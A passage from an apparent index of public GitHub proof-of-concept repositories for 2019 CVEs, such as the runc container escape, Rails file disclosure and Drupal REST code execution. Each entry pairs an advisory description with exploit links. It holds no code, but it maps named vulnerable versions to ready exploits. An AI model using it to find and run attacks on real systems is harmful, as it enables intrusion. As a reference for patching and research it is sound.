- [forse01/CVE-2019-5413-NetBeans-NoJson](https://github.com/forse01/CVE-2019-5413-NetBeans-NoJson)

### CVE-2019-5418 (2019-03-27)

There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.

- [mpgn/CVE-2019-5418](https://github.com/mpgn/CVE-2019-5418)
- [omarkurt/CVE-2019-5418](https://github.com/omarkurt/CVE-2019-5418)
- [brompwnie/CVE-2019-5418-Scanner](https://github.com/brompwnie/CVE-2019-5418-Scanner)
- [mpgn/Rails-doubletap-RCE](https://github.com/mpgn/Rails-doubletap-RCE)
- [takeokunn/CVE-2019-5418](https://github.com/takeokunn/CVE-2019-5418)
- [Bad3r/RailroadBandit](https://github.com/Bad3r/RailroadBandit)
- [ztgrace/CVE-2019-5418-Rails3](https://github.com/ztgrace/CVE-2019-5418-Rails3)
- [random-robbie/CVE-2019-5418](https://github.com/random-robbie/CVE-2019-5418)
- [kailing0220/CVE-2019-5418](https://github.com/kailing0220/CVE-2019-5418)

### CVE-2019-5420 (2019-03-27)

A remote code execution vulnerability in development mode Rails <5.2.2.1, <6.0.0.beta3 can allow an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with other Rails internals to escalate to a remote code execution exploit.

- [knqyf263/CVE-2019-5420](https://github.com/knqyf263/CVE-2019-5420)
- [cved-sources/cve-2019-5420](https://github.com/cved-sources/cve-2019-5420)
- [AnasTaoutaou/CVE-2019-5420](https://github.com/AnasTaoutaou/CVE-2019-5420)
- [Eremiel/CVE-2019-5420](https://github.com/Eremiel/CVE-2019-5420)
- [scumdestroy/CVE-2019-5420.rb](https://github.com/scumdestroy/CVE-2019-5420.rb)
- [j4k0m/CVE-2019-5420](https://github.com/j4k0m/CVE-2019-5420)
- [mmeza-developer/CVE-2019-5420-RCE](https://github.com/mmeza-developer/CVE-2019-5420-RCE)
- [trickstersec/CVE-2019-5420](https://github.com/trickstersec/CVE-2019-5420)
- [PenTestical/CVE-2019-5420](https://github.com/PenTestical/CVE-2019-5420)
- [laffray/ruby-RCE-CVE-2019-5420-](https://github.com/laffray/ruby-RCE-CVE-2019-5420-)

### CVE-2019-5427 (2019-04-22)

c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.

- [shanika04/cp30_XXE_partial_fix](https://github.com/shanika04/cp30_XXE_partial_fix)

### CVE-2019-5454 (2019-07-30)

SQL Injection in the Nextcloud Android app prior to version 3.0.0 allows a harmful query, when executed, to destroy the local cache, requiring the account to be set up again.

- [shanika04/nextcloud_android](https://github.com/shanika04/nextcloud_android)

### CVE-2019-5475 (2019-09-03)

The Nexus Yum Repository Plugin in v2 is vulnerable to Remote Code Execution when instances using CommandLineExecutor.java are supplied vulnerable data, such as the Yum Configuration Capability.

- [jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-](https://github.com/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-)
- [rabbitmask/CVE-2019-5475-EXP](https://github.com/rabbitmask/CVE-2019-5475-EXP)
- [EXP-Docs/CVE-2019-5475](https://github.com/EXP-Docs/CVE-2019-5475)

### CVE-2019-5489 (2019-01-07)

The mincore() implementation in mm/mincore.c in the Linux kernel through 4.19.13 allowed local attackers to observe page cache access patterns of other processes on the same system, potentially allowing sniffing of secret information. (Fixing this affects the output of the fincore program.) Limited remote exploitation may be possible, as demonstrated by latency differences in accessing public files from an Apache HTTP Server.

- [mmxsrup/CVE-2019-5489](https://github.com/mmxsrup/CVE-2019-5489)

### CVE-2019-5544 (2019-12-06)

OpenSLP as used in ESXi and the Horizon DaaS appliances has a heap overwrite issue. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

- [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992)
- [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs)
- [vpxuser/VMware-ESXI-OpenSLP-Exploit](https://github.com/vpxuser/VMware-ESXI-OpenSLP-Exploit)

### CVE-2019-5596 (2019-02-12)

In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail.

- [raymontag/CVE-2019-5596](https://github.com/raymontag/CVE-2019-5596)

### CVE-2019-5603 (2019-07-26)

In FreeBSD 12.0-STABLE before r350261, 12.0-RELEASE before 12.0-RELEASE-p8, 11.3-STABLE before r350263, 11.3-RELEASE before 11.3-RELEASE-p1, and 11.2-RELEASE before 11.2-RELEASE-p12, system calls operating on file descriptors as part of mqueuefs did not properly release the reference allowing a malicious user to overflow the counter allowing access to files, directories, and sockets opened by processes owned by other users.

- [raymontag/CVE-2019-5603](https://github.com/raymontag/CVE-2019-5603)

### CVE-2019-5624 (2019-04-30)

Rapid7 Metasploit Framework suffers from an instance of CWE-22, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in the Zip import function of Metasploit. Exploiting this vulnerability can allow an attacker to execute arbitrary code in Metasploit at the privilege level of the user running Metasploit. This issue affects: Rapid7 Metasploit Framework version 4.14.0 and prior versions.

- [VoidSec/CVE-2019-5624](https://github.com/VoidSec/CVE-2019-5624)

### CVE-2019-5630 (2019-07-03)

A Cross-Site Request Forgery (CSRF) vulnerability was found in Rapid7 Nexpose InsightVM Security Console versions 6.5.0 through 6.5.68. This issue allows attackers to exploit CSRF vulnerabilities on API endpoints using Flash to circumvent a cross-domain pre-flight OPTIONS request.

- [rbeede/CVE-2019-5630](https://github.com/rbeede/CVE-2019-5630)

### CVE-2019-5700 (2019-10-09)

NVIDIA Shield TV Experience prior to v8.0.1, NVIDIA Tegra software contains a vulnerability in the bootloader, where it does not validate the fields of the boot image, which may lead to code execution, denial of service, escalation of privileges, and information disclosure.

- [oscardagrach/CVE-2019-5700](https://github.com/oscardagrach/CVE-2019-5700)

### CVE-2019-5736 (2019-02-11)

runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.

- [q3k/cve-2019-5736-poc](https://github.com/q3k/cve-2019-5736-poc)
- [Frichetten/CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC)
- [jas502n/CVE-2019-5736](https://github.com/jas502n/CVE-2019-5736)
- [likekabin/CVE-2019-5736](https://github.com/likekabin/CVE-2019-5736)
- [likekabin/cve-2019-5736-poc](https://github.com/likekabin/cve-2019-5736-poc)
- [agppp/cve-2019-5736-poc](https://github.com/agppp/cve-2019-5736-poc)
- [b3d3c/poc-cve-2019-5736](https://github.com/b3d3c/poc-cve-2019-5736)
- [twistlock/RunC-CVE-2019-5736](https://github.com/twistlock/RunC-CVE-2019-5736)
- [yyqs2008/CVE-2019-5736-PoC-2](https://github.com/yyqs2008/CVE-2019-5736-PoC-2)
- [zyriuse75/CVE-2019-5736-PoC](https://github.com/zyriuse75/CVE-2019-5736-PoC)
- [stillan00b/CVE-2019-5736](https://github.com/stillan00b/CVE-2019-5736)
- [milloni/cve-2019-5736-exp](https://github.com/milloni/cve-2019-5736-exp)
- [panzouh/Docker-Runc-Exploit](https://github.com/panzouh/Docker-Runc-Exploit)
- [RyanNgWH/CVE-2019-5736-POC](https://github.com/RyanNgWH/CVE-2019-5736-POC)
- [Lee-SungYoung/cve-2019-5736-study](https://github.com/Lee-SungYoung/cve-2019-5736-study)
- [chosam2/cve-2019-5736-poc](https://github.com/chosam2/cve-2019-5736-poc)
- [epsteina16/Docker-Escape-Miner](https://github.com/epsteina16/Docker-Escape-Miner)
- [geropl/CVE-2019-5736](https://github.com/geropl/CVE-2019-5736)
- [GiverOfGifts/CVE-2019-5736-Custom-Runtime](https://github.com/GiverOfGifts/CVE-2019-5736-Custom-Runtime)
- [Billith/CVE-2019-5736-PoC](https://github.com/Billith/CVE-2019-5736-PoC)
- [BBRathnayaka/POC-CVE-2019-5736](https://github.com/BBRathnayaka/POC-CVE-2019-5736)
- [shen54/IT19172088](https://github.com/shen54/IT19172088)
- [h3xcr4ck3r/CVE-2019-5736](https://github.com/h3xcr4ck3r/CVE-2019-5736)
- [fahmifj/Docker-breakout-runc](https://github.com/fahmifj/Docker-breakout-runc)
- [Asbatel/CVE-2019-5736_POC](https://github.com/Asbatel/CVE-2019-5736_POC)
- [takumak/cve-2019-5736-reproducer](https://github.com/takumak/cve-2019-5736-reproducer)
- [si1ent-le/CVE-2019-5736](https://github.com/si1ent-le/CVE-2019-5736)

### CVE-2019-5737 (2019-03-28)

In Node.js including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1, an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and by sending headers very slowly. This keeps the connection and associated resources alive for a long period of time. Potential attacks are mitigated by the use of a load balancer or other proxy layer. This vulnerability is an extension of CVE-2018-12121, addressed in November and impacts all active Node.js release lines including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1.

- [beelzebruh/cve-2019-5737](https://github.com/beelzebruh/cve-2019-5737)

### CVE-2019-5782 (2019-02-19)

Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.

- [ZwCreatePhoton/CVE-2019-5782_CVE-2019-13768](https://github.com/ZwCreatePhoton/CVE-2019-5782_CVE-2019-13768)

### CVE-2019-5784 (2019-06-27)

Incorrect handling of deferred code in V8 in Google Chrome prior to 72.0.3626.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [rooootdev/CVE-2019-5784-PoC](https://github.com/rooootdev/CVE-2019-5784-PoC)

### CVE-2019-5786 (2019-06-27)

Object lifetime issue in Blink in Google Chrome prior to 72.0.3626.121 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.

- [exodusintel/CVE-2019-5786](https://github.com/exodusintel/CVE-2019-5786)

### CVE-2019-5822 (2019-06-27)

Inappropriate implementation in Blink in Google Chrome prior to 74.0.3729.108 allowed a remote attacker to bypass same origin policy via a crafted HTML page.

- [Silence-Rain/14-828_Exploitation_of_CVE-2019-5822](https://github.com/Silence-Rain/14-828_Exploitation_of_CVE-2019-5822)

### CVE-2019-5825 (2019-11-25)

Out of bounds write in JavaScript in Google Chrome prior to 73.0.3683.86 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [timwr/CVE-2019-5825](https://github.com/timwr/CVE-2019-5825)

### CVE-2019-5893 (2019-01-10)

Nelson Open Source ERP v6.3.1 allows SQL Injection via the db/utils/query/data.xml query parameter.

- [EmreOvunc/OpenSource-ERP-SQL-Injection](https://github.com/EmreOvunc/OpenSource-ERP-SQL-Injection)

### CVE-2019-6111 (2019-01-31)

An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).

- [53n7hu/SNP](https://github.com/53n7hu/SNP)
- [mbadanoiu/MAL-008](https://github.com/mbadanoiu/MAL-008)

### CVE-2019-6203 (2020-04-17)

A logic issue was addressed with improved state management. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2. An attacker in a privileged network position may be able to intercept network traffic.

- [qingxp9/CVE-2019-6203-PoC](https://github.com/qingxp9/CVE-2019-6203-PoC)

### CVE-2019-6207 (2019-12-18)

An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, tvOS 12.2, watchOS 5.2. A malicious application may be able to determine kernel memory layout.

- [dothanthitiendiettiende/CVE-2019-6207](https://github.com/dothanthitiendiettiende/CVE-2019-6207)
- [maldiohead/CVE-2019-6207](https://github.com/maldiohead/CVE-2019-6207)
- [DimitriFourny/cve-2019-6207](https://github.com/DimitriFourny/cve-2019-6207)

### CVE-2019-6225 (2019-03-05)

A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 12.1.3, macOS Mojave 10.14.3, tvOS 12.1.2. A malicious application may be able to elevate privileges.

- [fatgrass/OsirisJailbreak12](https://github.com/fatgrass/OsirisJailbreak12)
- [TrungNguyen1909/CVE-2019-6225-macOS](https://github.com/TrungNguyen1909/CVE-2019-6225-macOS)
- [raystyle/jailbreak-iOS12](https://github.com/raystyle/jailbreak-iOS12)

### CVE-2019-6249 (2019-01-13)

An issue was discovered in HuCart v5.7.4. There is a CSRF vulnerability that can add an admin account via /adminsys/index.php?load=admins&act=edit_info&act_type=add.

- [AlphabugX/CVE-2019-6249_Hucart-cms](https://github.com/AlphabugX/CVE-2019-6249_Hucart-cms)

### CVE-2019-6250 (2019-01-13)

A pointer overflow, with code execution, was discovered in ZeroMQ libzmq (aka 0MQ) 4.2.x and 4.3.x before 4.3.1. A v2_decoder.cpp zmq::v2_decoder_t::size_ready integer overflow allows an authenticated attacker to overwrite an arbitrary amount of bytes beyond the bounds of a buffer, which can be leveraged to run arbitrary code on the target system. The memory layout allows the attacker to inject OS commands into a data structure located immediately after the problematic buffer (i.e., it is not necessary to use a typical buffer-overflow exploitation technique that changes the flow of control).

- [AkashicYiTai/CVE-2019-6250-libzmq](https://github.com/AkashicYiTai/CVE-2019-6250-libzmq)

### CVE-2019-6260 (2019-01-22)

The ASPEED ast2400 and ast2500 Baseband Management Controller (BMC) hardware and firmware implement Advanced High-performance Bus (AHB) bridges, which allow arbitrary read and write access to the BMC's physical address space from the host (or from the network in unusual cases where the BMC console uart is attached to a serial concentrator). This CVE applies to the specific cases of iLPC2AHB bridge Pt I, iLPC2AHB bridge Pt II, PCIe VGA P2A bridge, DMA from/to arbitrary BMC memory via X-DMA, UART-based SoC Debug interface, LPC2AHB bridge, PCIe BMC P2A bridge, and Watchdog setup.

- [nikitapbst/cve-2019-6260](https://github.com/nikitapbst/cve-2019-6260)

### CVE-2019-6263 (2019-01-16)

An issue was discovered in Joomla! before 3.9.2. Inadequate checks of the Global Configuration Text Filter settings allowed stored XSS.

- [praveensutar/CVE-2019-6263-Joomla-POC](https://github.com/praveensutar/CVE-2019-6263-Joomla-POC)

### CVE-2019-6329 (2019-06-25)

HP Support Assistant 8.7.50 and earlier allows a user to gain system privilege and allows unauthorized modification of directories or files. Note: A different vulnerability than CVE-2019-6328.

- [ManhNDd/CVE-2019-6329](https://github.com/ManhNDd/CVE-2019-6329)

### CVE-2019-6339 (2019-01-22)

In Drupal Core versions 7.x prior to 7.62, 8.6.x prior to 8.6.6 and 8.5.x prior to 8.5.9; A remote code execution vulnerability exists in PHP's built-in phar stream wrapper when performing file operations on an untrusted phar:// URI. Some Drupal code (core, contrib, and custom) may be performing file operations on insufficiently validated user input, thereby being exposed to this vulnerability. This vulnerability is mitigated by the fact that such code paths typically require access to an administrative permission or an atypical configuration.

- [Vulnmachines/drupal-cve-2019-6339](https://github.com/Vulnmachines/drupal-cve-2019-6339)

### CVE-2019-6340 (2019-02-21)

Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services module itself does not require an update at this time, but you should apply other contributed updates associated with this advisory if Services is in use.)

- [g0rx/Drupal-SA-CORE-2019-003](https://github.com/g0rx/Drupal-SA-CORE-2019-003)
- [knqyf263/CVE-2019-6340](https://github.com/knqyf263/CVE-2019-6340)
- [DevDungeon/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass](https://github.com/DevDungeon/CVE-2019-6340-Drupal-8.6.9-REST-Auth-Bypass)
- [oways/CVE-2019-6340](https://github.com/oways/CVE-2019-6340)
- [cved-sources/cve-2019-6340](https://github.com/cved-sources/cve-2019-6340)
- [josehelps/cve-2019-6340-bits](https://github.com/josehelps/cve-2019-6340-bits)
- [jas502n/CVE-2019-6340](https://github.com/jas502n/CVE-2019-6340)
- [ludy-dev/drupal8-REST-RCE](https://github.com/ludy-dev/drupal8-REST-RCE)
- [nobodyatall648/CVE-2019-6340](https://github.com/nobodyatall648/CVE-2019-6340)

### CVE-2019-6440 (2019-01-16)

Zemana AntiMalware before 3.0.658 Beta mishandles update logic.

- [hexnone/CVE-2019-6440](https://github.com/hexnone/CVE-2019-6440)

### CVE-2019-6446 (2019-01-16)

An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources.

- [RayScri/CVE-2019-6446](https://github.com/RayScri/CVE-2019-6446)

### CVE-2019-6447 (2019-01-16)

The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.

- [fs0c131y/ESFileExplorerOpenPortVuln](https://github.com/fs0c131y/ESFileExplorerOpenPortVuln)
- [SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447](https://github.com/SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447)
- [Nehal-Zaman/CVE-2019-6447](https://github.com/Nehal-Zaman/CVE-2019-6447)
- [h3xcr4ck3r/CVE-2019-6447](https://github.com/h3xcr4ck3r/CVE-2019-6447)
- [julio-cfa/POC-ES-File-Explorer-CVE-2019-6447](https://github.com/julio-cfa/POC-ES-File-Explorer-CVE-2019-6447)
- [febinrev/CVE-2019-6447-ESfile-explorer-exploit](https://github.com/febinrev/CVE-2019-6447-ESfile-explorer-exploit)
- [Kayky-cmd/CVE-2019-6447--.](https://github.com/Kayky-cmd/CVE-2019-6447--.)
- [VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer](https://github.com/VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer)
- [Osuni-99/CVE-2019-6447](https://github.com/Osuni-99/CVE-2019-6447)
- [Chethine/EsFileExplorer-CVE-2019-6447](https://github.com/Chethine/EsFileExplorer-CVE-2019-6447)
- [vino-theva/CVE-2019-6447](https://github.com/vino-theva/CVE-2019-6447)
- [KaviDk/CVE-2019-6447-in-Mobile-Application](https://github.com/KaviDk/CVE-2019-6447-in-Mobile-Application)
- [Cmadhushanka/CVE-2019-6447-Exploitation](https://github.com/Cmadhushanka/CVE-2019-6447-Exploitation)

### CVE-2019-6453 (2019-02-18)

mIRC before 7.55 allows remote command execution by using argument injection through custom URI protocol handlers. The attacker can specify an irc:// URI that loads an arbitrary .ini file from a UNC share pathname. Exploitation depends on browser-specific URI handling (Chrome is not exploitable).

- [proofofcalc/cve-2019-6453-poc](https://github.com/proofofcalc/cve-2019-6453-poc)
- [andripwn/mIRC-CVE-2019-6453](https://github.com/andripwn/mIRC-CVE-2019-6453)

### CVE-2019-6467 (2019-10-09)

A programming error in the nxdomain-redirect feature can cause an assertion failure in query.c if the alternate namespace used by nxdomain-redirect is a descendant of a zone that is served locally. The most likely scenario where this might occur is if the server, in addition to performing NXDOMAIN redirection for recursive clients, is also serving a local copy of the root zone or using mirroring to provide the root zone, although other configurations are also possible. Versions affected: BIND 9.12.0 -> 9.12.4, 9.14.0. Also affects all releases in the 9.13 development branch.

- [knqyf263/CVE-2019-6467](https://github.com/knqyf263/CVE-2019-6467)

### CVE-2019-6487 (2019-01-18)

TP-Link WDR Series devices through firmware v3 (such as TL-WDR5620 V3.0) are affected by command injection (after login) leading to remote code execution, because shell metacharacters can be included in the weather get_weather_observe citycode field.

- [afang5472/TP-Link-WDR-Router-Command-injection_POC](https://github.com/afang5472/TP-Link-WDR-Router-Command-injection_POC)

### CVE-2019-6690 (2019-03-17)

python-gnupg 0.4.3 allows context-dependent attackers to trick gnupg to decrypt other ciphertext than intended. To perform the attack, the passphrase to gnupg must be controlled by the adversary and the ciphertext should be trusted. Related to a "CWE-20: Improper Input Validation" issue affecting the affect functionality component.

- [stigtsp/CVE-2019-6690-python-gnupg-vulnerability](https://github.com/stigtsp/CVE-2019-6690-python-gnupg-vulnerability)
- [brianwrf/CVE-2019-6690](https://github.com/brianwrf/CVE-2019-6690)

### CVE-2019-6693 (2019-11-21)

Use of a hard-coded cryptographic key to cipher sensitive data in FortiOS configuration backup file may allow an attacker with access to the backup file to decipher the sensitive data, via knowledge of the hard-coded key. The aforementioned sensitive data includes users' passwords (except the administrator's password), private keys' passphrases and High Availability password (when set).

- [gquere/CVE-2019-6693](https://github.com/gquere/CVE-2019-6693)
- [synacktiv/CVE-2020-9289](https://github.com/synacktiv/CVE-2020-9289)
- [saladandonionrings/cve-2019-6693](https://github.com/saladandonionrings/cve-2019-6693)

### CVE-2019-6715 (2019-04-01)

pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data.

- [random-robbie/cve-2019-6715](https://github.com/random-robbie/cve-2019-6715)

### CVE-2019-7192 (2019-12-05)

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommends updating Photo Station to the latest version.

- [cycraft-corp/cve-2019-7192-check](https://github.com/cycraft-corp/cve-2019-7192-check)
- [th3gundy/CVE-2019-7192_QNAP_Exploit](https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit)

### CVE-2019-7213 (2019-04-24)

SmarterTools SmarterMail 16.x before build 6985 allows directory traversal. An authenticated user could delete arbitrary files or could create files in new folders in arbitrary locations on the mail server. This could lead to command execution on the server for instance by putting files inside the web directories.

- [secunnix/CVE-2019-7213](https://github.com/secunnix/CVE-2019-7213)

### CVE-2019-7214 (2019-04-24)

SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.

- [devzspy/CVE-2019-7214](https://github.com/devzspy/CVE-2019-7214)
- [andyfeili/-CVE-2019-7214](https://github.com/andyfeili/-CVE-2019-7214)

### CVE-2019-7216 (2019-01-31)

An issue was discovered in FileChucker 4.99e-free-e02. filechucker.cgi has a filter bypass that allows a malicious user to upload any type of file by using % characters within the extension, e.g., file.%ph%p becomes file.php.

- [Ekultek/CVE-2019-7216](https://github.com/Ekultek/CVE-2019-7216)

### CVE-2019-7219 (2019-04-11)

Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.

- [verifysecurity/CVE-2019-7219](https://github.com/verifysecurity/CVE-2019-7219)

### CVE-2019-7238 (2019-03-21)

Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.

- [mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238)
- [jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238)
- [verctor/nexus_rce_CVE-2019-7238](https://github.com/verctor/nexus_rce_CVE-2019-7238)
- [magicming200/CVE-2019-7238_Nexus_RCE_Tool](https://github.com/magicming200/CVE-2019-7238_Nexus_RCE_Tool)
- [smallpiggy/CVE-2019-7238](https://github.com/smallpiggy/CVE-2019-7238)

### CVE-2019-7304 (2019-04-23)

Canonical snapd before version 2.37.1 incorrectly performed socket owner validation, allowing an attacker to run arbitrary commands as root. This issue affects: Canonical snapd versions prior to 2.37.1.

- [initstring/dirty_sock](https://github.com/initstring/dirty_sock)
- [SecuritySi/CVE-2019-7304_DirtySock](https://github.com/SecuritySi/CVE-2019-7304_DirtySock)
- [elvi7major/snap_priv_esc](https://github.com/elvi7major/snap_priv_esc)
- [f4T1H21/dirty_sock](https://github.com/f4T1H21/dirty_sock)

### CVE-2019-7356 (2020-11-04)

Subrion CMS v4.2.1 allows XSS via the panel/phrases/ VALUE parameter.

- [ngpentest007/CVE-2019-7356](https://github.com/ngpentest007/CVE-2019-7356)

### CVE-2019-7357 (2020-11-10)

Subrion CMS 4.2.1 has CSRF in panel/modules/plugins/. The attacker can remotely activate/deactivate the plugins.

- [ngpentest007/CVE-2019-7357](https://github.com/ngpentest007/CVE-2019-7357)

### CVE-2019-7406

- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)

### CVE-2019-7482 (2019-12-19)

Stack-based buffer overflow in SonicWall SMA100 allows an unauthenticated user to execute arbitrary code in function libSys.so. This vulnerability impacted SMA100 version 9.0.0.3 and earlier.

- [singletrackseeker/CVE-2019-7482](https://github.com/singletrackseeker/CVE-2019-7482)
- [b4bay/CVE-2019-7482](https://github.com/b4bay/CVE-2019-7482)
- [w0lfzhang/sonicwall-cve-2019-7482](https://github.com/w0lfzhang/sonicwall-cve-2019-7482)

### CVE-2019-7489 (2019-12-23)

A vulnerability in the SonicWall Email Security appliance allows an unauthenticated user to perform remote code execution. This vulnerability affected Email Security Appliance version 10.0.2 and earlier.

- [nromsdahl/CVE-2019-7489](https://github.com/nromsdahl/CVE-2019-7489)

### CVE-2019-7609 (2019-03-25)

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

- [jas502n/kibana-RCE](https://github.com/jas502n/kibana-RCE)
- [mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609)
- [LandGrey/CVE-2019-7609](https://github.com/LandGrey/CVE-2019-7609)
- [hekadan/CVE-2019-7609](https://github.com/hekadan/CVE-2019-7609)
- [rhbb/CVE-2019-7609](https://github.com/rhbb/CVE-2019-7609)
- [dnr6419/CVE-2019-7609](https://github.com/dnr6419/CVE-2019-7609)
- [wolf1892/CVE-2019-7609](https://github.com/wolf1892/CVE-2019-7609)
- [Cr4ckC4t/cve-2019-7609](https://github.com/Cr4ckC4t/cve-2019-7609)
- [OliveiraaX/CVE-2019-7609-KibanaRCE](https://github.com/OliveiraaX/CVE-2019-7609-KibanaRCE)
- [Akshay15-png/CVE-2019-7609](https://github.com/Akshay15-png/CVE-2019-7609)

### CVE-2019-7616 (2019-07-30)

Kibana versions before 6.8.2 and 7.2.1 contain a server side request forgery (SSRF) flaw in the graphite integration for Timelion visualizer. An attacker with administrative Kibana access could set the timelion:graphite.url configuration option to an arbitrary URL. This could possibly lead to an attacker accessing external URL resources as the Kibana process on the host system.

- [random-robbie/CVE-2019-7616](https://github.com/random-robbie/CVE-2019-7616)

### CVE-2019-7642 (2019-03-25)

D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10).

- [xw77cve/CVE-2019-7642](https://github.com/xw77cve/CVE-2019-7642)

### CVE-2019-7839 (2019-06-12)

ColdFusion versions Update 3 and earlier, Update 10 and earlier, and Update 18 and earlier have a command injection vulnerability. Successful exploitation could lead to arbitrary code execution.

- [securifera/CVE-2019-7839](https://github.com/securifera/CVE-2019-7839)

### CVE-2019-8014 (2019-08-20)

Adobe Acrobat and Reader versions 2019.012.20035 and earlier, 2019.012.20035 and earlier, 2017.011.30142 and earlier, 2017.011.30143 and earlier, 2015.006.30497 and earlier, and 2015.006.30498 and earlier have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution.

- [f01965/CVE-2019-8014](https://github.com/f01965/CVE-2019-8014)

### CVE-2019-8331 (2019-02-20)

In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.

- [Snorlyd/https-nj.gov---CVE-2019-8331](https://github.com/Snorlyd/https-nj.gov---CVE-2019-8331)
- [Thampakon/CVE-2019-8331](https://github.com/Thampakon/CVE-2019-8331)

### CVE-2019-8341 (2019-02-15)

An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.

- [adindrabkin/llama_facts](https://github.com/adindrabkin/llama_facts)

### CVE-2019-8389 (2019-02-17)

A file-read vulnerability was identified in the Wi-Fi transfer feature of Musicloud 1.6. By default, the application runs a transfer service on port 8080, accessible by everyone on the same Wi-Fi network. An attacker can send the POST parameters downfiles and cur-folder (with a crafted ../ payload) to the download.script endpoint. This will create a MusicPlayerArchive.zip archive that is publicly accessible and includes the content of any requested file (such as the /etc/passwd file).

- [shawarkhanethicalhacker/CVE-2019-8389](https://github.com/shawarkhanethicalhacker/CVE-2019-8389)

